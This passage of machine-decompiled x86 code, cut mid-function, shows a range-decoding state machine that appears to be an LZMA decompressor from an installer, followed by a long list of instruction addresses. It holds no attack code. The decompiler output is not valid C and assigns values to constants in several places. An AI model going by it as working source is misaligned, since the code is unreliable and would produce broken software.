											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                                                    0x00000000
                                                                                                                    0x0040680a
                                                                                                                    0x0040680a
                                                                                                                    0x0040680e
                                                                                                                    0x00406833
                                                                                                                    0x0040683d
                                                                                                                    0x00000000
                                                                                                                    0x00406810
                                                                                                                    0x00406810
                                                                                                                    0x00406813
                                                                                                                    0x00406817
                                                                                                                    0x0040681a
                                                                                                                    0x0040681d
                                                                                                                    0x00406821
                                                                                                                    0x00406821
                                                                                                                    0x00406824
                                                                                                                    0x004068fe
                                                                                                                    0x004068fe
                                                                                                                    0x00406905
                                                                                                                    0x00406905
                                                                                                                    0x00406908
                                                                                                                    0x0040690f
                                                                                                                    0x0040693c
                                                                                                                    0x00406940
                                                                                                                    0x004069a0
                                                                                                                    0x004069a3
                                                                                                                    0x004069a8
                                                                                                                    0x004069a9
                                                                                                                    0x004069ab
                                                                                                                    0x004069ad
                                                                                                                    0x004069b0
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406061
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00000000
                                                                                                                    0x00406072
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040607b
                                                                                                                    0x0040607e
                                                                                                                    0x00406081
                                                                                                                    0x00406085
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040608b
                                                                                                                    0x0040608e
                                                                                                                    0x00406090
                                                                                                                    0x00406091
                                                                                                                    0x00406094
                                                                                                                    0x00406096
                                                                                                                    0x00406097
                                                                                                                    0x00406099
                                                                                                                    0x0040609c
                                                                                                                    0x004060a1
                                                                                                                    0x004060a6
                                                                                                                    0x004060af
                                                                                                                    0x004060c2
                                                                                                                    0x004060c5
                                                                                                                    0x004060d1
                                                                                                                    0x004060f9
                                                                                                                    0x004060fb
                                                                                                                    0x00406109
                                                                                                                    0x00406109
                                                                                                                    0x0040610d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060fd
                                                                                                                    0x00406100
                                                                                                                    0x00406101
                                                                                                                    0x00406101
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060d7
                                                                                                                    0x004060dc
                                                                                                                    0x004060dc
                                                                                                                    0x004060e5
                                                                                                                    0x004060ed
                                                                                                                    0x004060f0
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x00406113
                                                                                                                    0x00406113
                                                                                                                    0x00406117
                                                                                                                    0x004069c3
                                                                                                                    0x00000000
                                                                                                                    0x004069c3
                                                                                                                    0x00406120
                                                                                                                    0x00406130
                                                                                                                    0x00406133
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406139
                                                                                                                    0x0040613d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040613f
                                                                                                                    0x00406145
                                                                                                                    0x0040616f
                                                                                                                    0x00406175
                                                                                                                    0x0040617c
                                                                                                                    0x00000000
                                                                                                                    0x0040617c
                                                                                                                    0x0040614b
                                                                                                                    0x0040614e
                                                                                                                    0x00406153
                                                                                                                    0x00406153
                                                                                                                    0x0040615e
                                                                                                                    0x00406166
                                                                                                                    0x00406169
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061ae
                                                                                                                    0x004061b4
                                                                                                                    0x004061b7
                                                                                                                    0x004061c4
                                                                                                                    0x004061cc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406183
                                                                                                                    0x00406183
                                                                                                                    0x00406187
                                                                                                                    0x004069d2
                                                                                                                    0x00000000
                                                                                                                    0x004069d2
                                                                                                                    0x00406193
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x004061a1
                                                                                                                    0x004061a4
                                                                                                                    0x004061a7
                                                                                                                    0x004061ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406849
                                                                                                                    0x0040684f
                                                                                                                    0x00406855
                                                                                                                    0x0040686f
                                                                                                                    0x00406872
                                                                                                                    0x00406878
                                                                                                                    0x00406883
                                                                                                                    0x00406883
                                                                                                                    0x00406885
                                                                                                                    0x00406857
                                                                                                                    0x00406857
                                                                                                                    0x00406866
                                                                                                                    0x0040686a
                                                                                                                    0x0040686a
                                                                                                                    0x0040688f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406891
                                                                                                                    0x00406895
                                                                                                                    0x00406a44
                                                                                                                    0x00000000
                                                                                                                    0x00406a44
                                                                                                                    0x004068a1
                                                                                                                    0x004068a8
                                                                                                                    0x004068b0
                                                                                                                    0x004068b3
                                                                                                                    0x004068b6
                                                                                                                    0x004068b6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061d4
                                                                                                                    0x004061d6
                                                                                                                    0x004061d9
                                                                                                                    0x0040624a
                                                                                                                    0x0040624d
                                                                                                                    0x00406250
                                                                                                                    0x00406257
                                                                                                                    0x00406261
                                                                                                                    0x00000000
                                                                                                                    0x00406261
                                                                                                                    0x004061db
                                                                                                                    0x004061df
                                                                                                                    0x004061e2
                                                                                                                    0x004061e4
                                                                                                                    0x004061e7
                                                                                                                    0x004061ea
                                                                                                                    0x004061ec
                                                                                                                    0x004061ef
                                                                                                                    0x004061f1
                                                                                                                    0x004061f6
                                                                                                                    0x004061f9
                                                                                                                    0x004061fc
                                                                                                                    0x00406200
                                                                                                                    0x00406207
                                                                                                                    0x0040620a
                                                                                                                    0x00406211
                                                                                                                    0x00406215
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x00406221
                                                                                                                    0x00406224
                                                                                                                    0x00406242
                                                                                                                    0x00406244
                                                                                                                    0x00000000
                                                                                                                    0x00406226
                                                                                                                    0x00406226
                                                                                                                    0x00406229
                                                                                                                    0x0040622c
                                                                                                                    0x0040622f
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406234
                                                                                                                    0x00406237
                                                                                                                    0x00406239
                                                                                                                    0x0040623a
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x00406473
                                                                                                                    0x00406477
                                                                                                                    0x00406495
                                                                                                                    0x00406498
                                                                                                                    0x0040649f
                                                                                                                    0x004064a2
                                                                                                                    0x004064a5
                                                                                                                    0x004064a8
                                                                                                                    0x004064ab
                                                                                                                    0x004064ae
                                                                                                                    0x004064b0
                                                                                                                    0x004064b7
                                                                                                                    0x004064b8
                                                                                                                    0x004064ba
                                                                                                                    0x004064bd
                                                                                                                    0x004064c0
                                                                                                                    0x004064c3
                                                                                                                    0x004064c3
                                                                                                                    0x004064c8
                                                                                                                    0x00000000
                                                                                                                    0x004064c8
                                                                                                                    0x00406479
                                                                                                                    0x0040647c
                                                                                                                    0x0040647f
                                                                                                                    0x00406489
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004064dd
                                                                                                                    0x004064e1
                                                                                                                    0x00406504
                                                                                                                    0x00406507
                                                                                                                    0x0040650a
                                                                                                                    0x00406514
                                                                                                                    0x004064e3
                                                                                                                    0x004064e3
                                                                                                                    0x004064e6
                                                                                                                    0x004064e9
                                                                                                                    0x004064ec
                                                                                                                    0x004064f9
                                                                                                                    0x004064fc
                                                                                                                    0x004064fc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406520
                                                                                                                    0x00406524
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040652a
                                                                                                                    0x0040652e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406534
                                                                                                                    0x00406536
                                                                                                                    0x0040653a
                                                                                                                    0x0040653a
                                                                                                                    0x0040653d
                                                                                                                    0x00406541
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406591
                                                                                                                    0x00406595
                                                                                                                    0x0040659c
                                                                                                                    0x0040659f
                                                                                                                    0x004065a2
                                                                                                                    0x004065ac
                                                                                                                    0x00000000
                                                                                                                    0x004065ac
                                                                                                                    0x00406597
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065b8
                                                                                                                    0x004065bc
                                                                                                                    0x004065c3
                                                                                                                    0x004065c6
                                                                                                                    0x004065c9
                                                                                                                    0x004065be
                                                                                                                    0x004065be
